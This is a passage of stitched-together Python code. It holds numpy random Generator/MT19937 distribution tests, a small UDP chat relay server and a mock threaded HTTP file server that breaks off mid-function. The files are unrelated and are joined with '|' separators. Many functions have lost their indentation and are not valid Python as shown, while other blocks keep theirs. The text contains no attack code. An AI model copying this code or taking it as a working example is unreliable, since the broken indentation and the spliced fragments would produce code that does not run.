    assert_array_almost_equal(actual, desired, decimal=14)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
std_gamma = random.standard_gamma
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
    # Broadcasting shape (then scale) to length 3 must reproduce the
    # same recorded values; negative parameters must raise.
    shape = [1]
    scale = [2]
    bad_shape = [-1]
    bad_scale = [-2]
    desired = np.array([1.34491986425611, 0.42760990636187, 1.4355697857258])

    random = Generator(MT19937(self.seed))
    gamma = random.gamma
    actual = gamma(shape * 3, scale)
    assert_array_almost_equal(actual, desired, decimal=14)
    assert_raises(ValueError, gamma, bad_shape * 3, scale)
    assert_raises(ValueError, gamma, shape * 3, bad_scale)

    random = Generator(MT19937(self.seed))
    gamma = random.gamma
    actual = gamma(shape, scale * 3)
    assert_array_almost_equal(actual, desired, decimal=14)
    assert_raises(ValueError, gamma, bad_shape, scale * 3)
    assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
    # Broadcasting dfnum (then dfden) to length 3 must reproduce the
    # same recorded values; negative degrees of freedom must raise.
    dfnum = [1]
    dfden = [2]
    bad_dfnum = [-1]
    bad_dfden = [-2]
    desired = np.array([0.07765056244107, 7.72951397913186, 0.05786093891763])

    random = Generator(MT19937(self.seed))
    f = random.f
    actual = f(dfnum * 3, dfden)
    assert_array_almost_equal(actual, desired, decimal=14)
    assert_raises(ValueError, f, bad_dfnum * 3, dfden)
    assert_raises(ValueError, f, dfnum * 3, bad_dfden)

    random = Generator(MT19937(self.seed))
    f = random.f
    actual = f(dfnum, dfden * 3)
    assert_array_almost_equal(actual, desired, decimal=14)
    assert_raises(ValueError, f, bad_dfnum, dfden * 3)
    assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
    # Broadcasting each of dfnum, dfden, and nonc in turn must reproduce
    # the same recorded values; invalid parameters must raise in every
    # broadcast position, and NaN nonc must propagate.
    dfnum = [2]
    dfden = [3]
    nonc = [4]
    bad_dfnum = [0]
    bad_dfden = [-1]
    bad_nonc = [-2]
    desired = np.array([2.02434240411421, 12.91838601070124, 1.24395160354629])

    random = Generator(MT19937(self.seed))
    nonc_f = random.noncentral_f
    actual = nonc_f(dfnum * 3, dfden, nonc)
    assert_array_almost_equal(actual, desired, decimal=14)
    assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
    assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
    assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
    assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)

    random = Generator(MT19937(self.seed))
    nonc_f = random.noncentral_f
    actual = nonc_f(dfnum, dfden * 3, nonc)
    assert_array_almost_equal(actual, desired, decimal=14)
    assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
    assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
    assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)

    random = Generator(MT19937(self.seed))
    nonc_f = random.noncentral_f
    actual = nonc_f(dfnum, dfden, nonc * 3)
    assert_array_almost_equal(actual, desired, decimal=14)
    assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
    assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
    assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
random = Generator(MT19937(self.seed))
desired = np.array([0.04714867120827, 0.1239390327694])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
desired = np.array([0.05573640064251, 1.47220224353539, 2.9469379318589])
random = Generator(MT19937(self.seed))
actual = random.chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
    # Broadcasting df (then nonc) to length 3 must reproduce the same
    # recorded values; negative parameters must raise in either layout.
    df = [1]
    nonc = [2]
    bad_df = [-1]
    bad_nonc = [-2]
    desired = np.array([0.07710766249436, 5.27829115110304, 0.630732147399])

    random = Generator(MT19937(self.seed))
    nonc_chi = random.noncentral_chisquare
    actual = nonc_chi(df * 3, nonc)
    assert_array_almost_equal(actual, desired, decimal=14)
    assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
    assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)

    random = Generator(MT19937(self.seed))
    nonc_chi = random.noncentral_chisquare
    actual = nonc_chi(df, nonc * 3)
    assert_array_almost_equal(actual, desired, decimal=14)
    assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
    assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
desired = np.array([-1.39498829447098, -1.23058658835223, 0.17207021065983])
random = Generator(MT19937(self.seed))
actual = random.standard_t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
    # Broadcasting mu (then kappa) to length 3 must reproduce the same
    # recorded values; a negative kappa must raise in either layout.
    mu = [2]
    kappa = [1]
    bad_kappa = [-1]
    desired = np.array([2.25935584988528, 2.23326261461399, -2.84152146503326])

    random = Generator(MT19937(self.seed))
    actual = random.vonmises(mu * 3, kappa)
    assert_array_almost_equal(actual, desired, decimal=14)
    assert_raises(ValueError, random.vonmises, mu * 3, bad_kappa)

    random = Generator(MT19937(self.seed))
    actual = random.vonmises(mu, kappa * 3)
    assert_array_almost_equal(actual, desired, decimal=14)
    assert_raises(ValueError, random.vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
desired = np.array([0.95905052946317, 0.2383810889437 , 1.04988745750013])
random = Generator(MT19937(self.seed))
actual = random.pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
desired = np.array([0.67245993212806, 0.21380495318094, 0.7177848928629])
random = Generator(MT19937(self.seed))
actual = random.weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
desired = np.array([0.48954864361052, 0.19249412888486, 0.51216834058807])
random = Generator(MT19937(self.seed))
actual = random.power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
    # Broadcasting loc (then scale) to length 3 must reproduce the same
    # recorded values; a negative scale must raise in either layout.
    loc = [0]
    scale = [1]
    bad_scale = [-1]
    desired = np.array([-1.09698732625119, -0.93470271947368, 0.71592671378202])

    random = Generator(MT19937(self.seed))
    laplace = random.laplace
    actual = laplace(loc * 3, scale)
    assert_array_almost_equal(actual, desired, decimal=14)
    assert_raises(ValueError, laplace, loc * 3, bad_scale)

    random = Generator(MT19937(self.seed))
    laplace = random.laplace
    actual = laplace(loc, scale * 3)
    assert_array_almost_equal(actual, desired, decimal=14)
    assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
    # Broadcasting loc (then scale) to length 3 must reproduce the same
    # recorded values; a negative scale must raise in either layout.
    loc = [0]
    scale = [1]
    bad_scale = [-1]
    desired = np.array([1.70020068231762, 1.52054354273631, -0.34293267607081])

    random = Generator(MT19937(self.seed))
    gumbel = random.gumbel
    actual = gumbel(loc * 3, scale)
    assert_array_almost_equal(actual, desired, decimal=14)
    assert_raises(ValueError, gumbel, loc * 3, bad_scale)

    random = Generator(MT19937(self.seed))
    gumbel = random.gumbel
    actual = gumbel(loc, scale * 3)
    assert_array_almost_equal(actual, desired, decimal=14)
    assert_raises(ValueError, gumbel, loc, bad_scale * 3)
# Logistic draws: same pinned stream for either broadcast argument; negative
# scale raises; scale=0 collapses the distribution to `loc` exactly.
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
desired = np.array([-1.607487640433, -1.40925686003678, 1.12887112820397])
random = Generator(MT19937(self.seed))
actual = random.logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.logistic, loc, bad_scale * 3)
# Degenerate case: zero scale returns loc deterministically.
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
desired = np.array([0.67884390500697, 2.21653186290321, 1.01990310084276])
random = Generator(MT19937(self.seed))
lognormal = random.lognormal
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
random = Generator(MT19937(self.seed))
actual = random.lognormal(mean, sigma * 3)
assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
# Rayleigh draws with a broadcast scale; pinned values for the seeded
# generator, negative scale raises.
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
desired = np.array([0.60439534475066, 0.66120048396359, 1.67873398389499])
random = Generator(MT19937(self.seed))
actual = random.rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.rayleigh, bad_scale * 3)
# Wald (inverse Gaussian) draws: mean must be > 0 and scale > 0; both
# broadcast directions produce the same pinned, re-seeded stream.
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
desired = np.array([0.38052407392905, 0.50701641508592, 0.484935249864])
random = Generator(MT19937(self.seed))
actual = random.wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
random = Generator(MT19937(self.seed))
actual = random.wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, random.wald, bad_mean, scale * 3)
assert_raises(ValueError, random.wald, mean, bad_scale * 3)
# Triangular draws broadcast over left/mode/right in turn; invalid orderings
# (left > mode, mode > right, left == right) must raise ValueError.
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
# `right * 2` is [3, 3]; unpacks into two scalar 3s (left == right == 3).
bad_left_two, bad_mode_two = right * 2
desired = np.array([1.57781954604754, 1.62665986867957, 2.30090130831326])
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two,
right)
# Same pinned stream when `mode` carries the broadcast length.
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3,
right)
# And again when `right` carries it.
random = Generator(MT19937(self.seed))
triangular = random.triangular
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two,
right * 3)
# Scalar argument validation.
assert_raises(ValueError, triangular, 10., 0., 20.)
assert_raises(ValueError, triangular, 10., 25., 20.)
assert_raises(ValueError, triangular, 10., 10., 10.)
# Binomial draws: n must be >= 0 and p in [0, 1]; both broadcast directions
# reproduce the same pinned integer stream.
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
binom = random.binomial
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
actual = random.binomial(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
# Negative-binomial draws: n > 0 and p in (0, 1]; pinned int64 stream for
# both broadcast directions.
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([0, 2, 1], dtype=np.int64)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
random = Generator(MT19937(self.seed))
neg_binom = random.negative_binomial
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
# Poisson draws: lam must be >= 0 and below the generator's documented
# maximum (_poisson_lam_max); pinned integer stream.
def test_poisson(self):
lam = [1]
bad_lam_one = [-1]
desired = np.array([0, 0, 3])
random = Generator(MT19937(self.seed))
max_lam = random._poisson_lam_max
bad_lam_two = [max_lam * 2]
poisson = random.poisson
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
# Zipf draws: a must be > 1; NaN parameters must also be rejected (the
# errstate guard silences the NaN-comparison warning, not the ValueError).
def test_zipf(self):
a = [2]
bad_a = [0]
desired = np.array([1, 8, 1])
random = Generator(MT19937(self.seed))
zipf = random.zipf
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
# Geometric draws with a broadcast success probability; p outside (0, 1]
# must raise.
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
desired = np.array([1, 1, 3])
random = Generator(MT19937(self.seed))
geometric = random.geometric
actual = geometric(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geometric, bad_p_one * 3)
assert_raises(ValueError, geometric, bad_p_two * 3)
# Hypergeometric draws broadcast over ngood/nbad/nsample in turn; negative
# counts, oversized samples, and arguments beyond the implementation limits
# must all raise ValueError.
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [-1]
bad_nsample_two = [4]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_two)
# Same pinned stream when `nbad` carries the broadcast length.
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_two)
# And when `nsample` carries it.
random = Generator(MT19937(self.seed))
hypergeom = random.hypergeometric
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
# Scalar argument validation.
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, -1)
assert_raises(ValueError, hypergeom, 10, 10, 25)
# ValueError for arguments that are too big.
assert_raises(ValueError, hypergeom, 2**30, 10, 20)
assert_raises(ValueError, hypergeom, 999, 2**31, 50)
assert_raises(ValueError, hypergeom, 999, [2**29, 2**30], 1000)
# Log-series draws with a broadcast p; p outside (0, 1) must raise.
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
desired = np.array([1, 1, 1])
random = Generator(MT19937(self.seed))
logseries = random.logseries
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
# Multinomial draws with a broadcast `n` ([5, 20]): the explicit
# size=(3, 2) case and the implicit-size case share the leading rows of
# the same pinned int64 stream.
def test_multinomial(self):
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]],
[[1, 0, 1, 0, 2, 1],
[7, 2, 2, 1, 4, 4]],
[[0, 2, 0, 1, 2, 0],
[3, 2, 3, 3, 4, 5]]], dtype=np.int64)
assert_array_equal(actual, desired)
# Without `size`, the output shape follows the broadcast n.
random = Generator(MT19937(self.seed))
actual = random.multinomial([5, 20], [1 / 6.] * 6)
desired = np.array([[0, 0, 2, 1, 2, 0],
[2, 3, 6, 4, 2, 3]], dtype=np.int64)
assert_array_equal(actual, desired)
class TestThread:
# make sure each state produces the same sequence even in threads
# NOTE(review): nose-style `setup` (not pytest's `setup_method`) — presumably
# matches the conventions of the surrounding test suite; confirm.
def setup(self):
self.seeds = range(4)
# Run `function` once per seed in a thread and once serially, then require
# the two result sets to match element-wise.
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(Generator(MT19937(s)), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(Generator(MT19937(s)), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1 / 6.] * 6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput:
# Distribution methods called with single-element array arguments must
# return arrays of shape (1,), including when some arguments are scalars.
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (random.exponential, random.standard_gamma,
random.chisquare, random.standard_t,
random.pareto, random.weibull,
random.power, random.rayleigh,
random.poisson, random.zipf,
random.geometric, random.logseries)
# These take a probability, so argOne=2 would be out of range.
probfuncs = (random.geometric, random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (random.uniform, random.normal,
random.beta, random.gamma,
random.f, random.noncentral_chisquare,
random.vonmises, random.laplace,
random.gumbel, random.logistic,
random.lognormal, random.wald,
random.binomial, random.negative_binomial)
probfuncs = (random.binomial, random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
# Array/array, scalar/array, array/scalar all broadcast to (1,).
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
# `endpoint` is a pytest fixture/param supplied by the surrounding suite.
def test_integers(self, endpoint):
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
func = random.integers
high = np.array([1])
low = np.array([0])
for dt in itype:
out = func(low, high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low[0], high, endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
out = func(low, high[0], endpoint=endpoint, dtype=dt)
assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [random.noncentral_f, random.triangular,
random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
@pytest.mark.parametrize("config", JUMP_TEST_DATA)
def test_jumped(config):
# Each config contains the initial seed, a number of raw steps,
# the sha256 hashes of the initial and the final states' keys and
# the position of the initial and the final state.
# These were produced using the original C implementation.
seed = config["seed"]
steps = config["steps"]
mt19937 = MT19937(seed)
# Burn step
mt19937.random_raw(steps)
key = mt19937.state["state"]["key"]
# Hashes were recorded on a little-endian machine; normalize byte order.
if sys.byteorder == 'big':
key = key.byteswap()
sha256 = hashlib.sha256(key)
assert mt19937.state["state"]["pos"] == config["initial"]["pos"]
assert sha256.hexdigest() == config["initial"]["key_sha256"]
# jumped() must land on the recorded post-jump state.
jumped = mt19937.jumped()
key = jumped.state["state"]["key"]
if sys.byteorder == 'big':
key = key.byteswap()
sha256 = hashlib.sha256(key)
assert jumped.state["state"]["pos"] == config["jumped"]["pos"]
assert sha256.hexdigest() == config["jumped"]["key_sha256"]
# An explicit `size` that is incompatible with the broadcast shape of the
# distribution parameters must raise ValueError, for 1-, 2- and 3-argument
# distributions as well as for a mismatched `out` buffer.
def test_broadcast_size_error():
mu = np.ones(3)
sigma = np.ones((4, 3))
size = (10, 4, 2)
assert random.normal(mu, sigma, size=(5, 4, 3)).shape == (5, 4, 3)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=size)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=(1, 3))
with pytest.raises(ValueError):
random.normal(mu, sigma, size=(4, 1, 1))
# 1 arg
shape = np.ones((4, 3))
with pytest.raises(ValueError):
random.standard_gamma(shape, size=size)
with pytest.raises(ValueError):
random.standard_gamma(shape, size=(3,))
with pytest.raises(ValueError):
random.standard_gamma(shape, size=3)
# Check out
out = np.empty(size)
with pytest.raises(ValueError):
random.standard_gamma(shape, out=out)
# 2 arg
with pytest.raises(ValueError):
random.binomial(1, [0.3, 0.7], size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], 0.3, size=(2, 1))
with pytest.raises(ValueError):
random.binomial([1, 2], [0.3, 0.7], size=(2, 1))
with pytest.raises(ValueError):
random.multinomial([2, 2], [.3, .7], size=(2, 1))
# 3 arg
a = random.chisquare(5, size=3)
b = random.chisquare(5, size=(4, 3))
c = random.chisquare(5, size=(5, 4, 3))
assert random.noncentral_f(a, b, c).shape == (5, 4, 3)
with pytest.raises(ValueError, match=r"Output size \(6, 5, 1, 1\) is"):
random.noncentral_f(a, b, c, size=(6, 5, 1, 1))
# A scalar `size` must also be validated against the broadcast parameter
# shape: 3 matches the length-3 parameters, 2 does not.
def test_broadcast_size_scalar():
mu = np.ones(3)
sigma = np.ones(3)
random.normal(mu, sigma, size=3)
with pytest.raises(ValueError):
random.normal(mu, sigma, size=2)
|
ServerSide.py | import socket
import threading
def removeTokenandSendMessage(encryptedmsg):
    """Strip the trailing one-character control token and broadcast the rest.

    The last character of ``encryptedmsg`` is a protocol token appended by
    the client ('0' = join, '2' = leave — see serverSide); everything before
    it is the payload, which is forwarded to every registered client in the
    parallel ``ipA``/``ipB`` (host/port) lists via the module-level UDP
    ``server`` socket.
    """
    # Slice instead of the previous char-by-char loop: identical result
    # (empty input stays empty) without quadratic string concatenation.
    payload = encryptedmsg[:-1]
    for host, port in zip(ipA, ipB):
        server.sendto(payload.encode('utf8'), (host, port))
# Main UDP receive loop: registers clients, relays messages, and removes
# clients, driven by the one-character token at the end of each datagram.
def serverSide():
global ipA, ipB
while True:
# Block until a datagram arrives; the bare except keeps the loop alive
# on transient socket errors (best-effort by design, but it also hides
# real failures — NOTE(review): consider narrowing to socket errors).
while True:
try:
msgBytes, clientIP = server.recvfrom(BUFFSIZE)
break
except:
pass
msgAnswer = msgBytes.decode('utf8')
# Protocol: last character is the control token.
token = msgAnswer[len(msgAnswer) - 1]
if token == '0':
# Token '0': new client — remember its (host, port) and broadcast.
ipA.append(clientIP[0])
ipB.append(clientIP[1])
removeTokenandSendMessage(msgAnswer)
else:
removeTokenandSendMessage(msgAnswer)
if token == '2':
# Token '2': client leaving — drop its registration entry.
# (The `break` right after the deletes makes the in-loop
# mutation safe.)
for i in range(0, len(ipA)):
if ipA[i] == clientIP[0] and ipB[i] == clientIP[1]:
del ipA[i]
del ipB[i]
print('Usuário removido com sucesso')
break
print(msgAnswer)
# --- Module state and server bootstrap ---
ipA = []  # registered client hosts (parallel to ipB)
ipB = []  # registered client ports (parallel to ipA)
BUFFSIZE = 4096
HOST = ''  # bind on all interfaces
PORT = 12000
ADDR = (HOST, PORT)

server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server.bind(ADDR)
print('Aguardando conexões...')

# BUG FIX: `target=serverSide()` invoked the handler immediately in the main
# thread (blocking forever) and would have handed its return value to Thread
# as the target.  Pass the function object itself so the loop runs in the
# worker thread.
ServerSideThread = threading.Thread(target=serverSide)
ServerSideThread.start()
ServerSideThread.join()
|
httpserver.py | import json
import socket
import threading
import logging
import re
from urllib.parse import urlparse
from pprint import pprint
#from MockHttpRequest import MockHttpRequest
#from MockHttpResponse import MockHttpResponse
from FileManager import FileManager
class MockHttpServer:
    """Minimal threaded HTTP server used for testing the file application.

    Listens on ``port`` and serves a small API backed by ``FileManager``
    over ``dataDirectory``: file list (``/``), file content (``/<name>``),
    a fixed ``/download`` payload, and httpbin-style ``/get`` / ``/post``
    echo endpoints.
    """

    BUFFER_SIZE = 1024  # 1 KiB read per recv() call

    def __init__(self, port=8080, d="."):
        # Port to listen on and the directory exposed through FileManager.
        self.port = port
        self.dataDirectory = d

    def start(self):
        """Accept connections forever, one handler thread per client."""
        logging.info("Starting web server...")
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            listener.bind(('', self.port))
            listener.listen(5)
            logging.info('Web server is listening at {}.'.format(self.port))
            while True:
                (conn, address) = listener.accept()
                logging.debug("Received a connection from {0}.".format(address))
                threading.Thread(target=self.handler,
                                 args=(conn, address, self.dataDirectory)).start()
        finally:
            logging.info("Shuting down the server...")
            listener.close()
            logging.info('Web server has been shut down at {}.'.format(self.port))

    def handler(self, conn, address, dirPath):
        """Read one request from ``conn``, send the response, close the socket."""
        try:
            # Convert bytes to string; assumes UTF-8 request bodies.
            data = self.recvall(conn).decode("utf-8")
            logging.debug("Received the data: \r\n{0}".format(data))
            requestParser = HttpRequestParser(data)
            logging.debug("Received the {0} request.".format(requestParser.method))
            response_msg = self.generateResponse(requestParser, dirPath)
            logging.debug('Response message: {0}.'.format(response_msg))
            conn.send(response_msg)
        except IOError as e:
            # BUG FIX: `logging.err` does not exist; the except clause itself
            # raised AttributeError and masked the original I/O failure.
            logging.error(e)
        finally:
            # Single close here replaces the redundant close inside `try`.
            conn.close()
            logging.debug("Disconnected from {0}.".format(address))

    def recvall(self, conn):
        """Read from ``conn`` until a short read signals end of data."""
        data = b''
        while True:
            part = conn.recv(self.BUFFER_SIZE)
            data += part
            if len(part) < self.BUFFER_SIZE:
                # either 0 or end of data
                break
        return data

    def generateResponse(self, requestParser, dirPath):
        """Build the full HTTP/1.1 response bytes for a parsed request."""
        # File app logic.
        fileapp = FileManager()
        # Defaults guard against method/operation combinations with no
        # matching branch below (previously `status`/`content` could be
        # unbound, turning a bad request into a NameError).
        status = 400
        content = ''
        if requestParser.method == HttpMethod.Get:
            if requestParser.operation == Operation.Download:
                status = 200
                requestParser.contentType = "text/html"
                content = "this is a download file for testig purpose."
            elif requestParser.operation == Operation.GetResource:
                status = 200
                content = "{\"args\": \"" + requestParser.getParameter + "\"}"
            elif requestParser.operation == Operation.GetFileList:
                fileapp.get_all_files(dirPath, requestParser.contentType)
                status = fileapp.status
                content = fileapp.content
            elif requestParser.operation == Operation.GetFileContent:
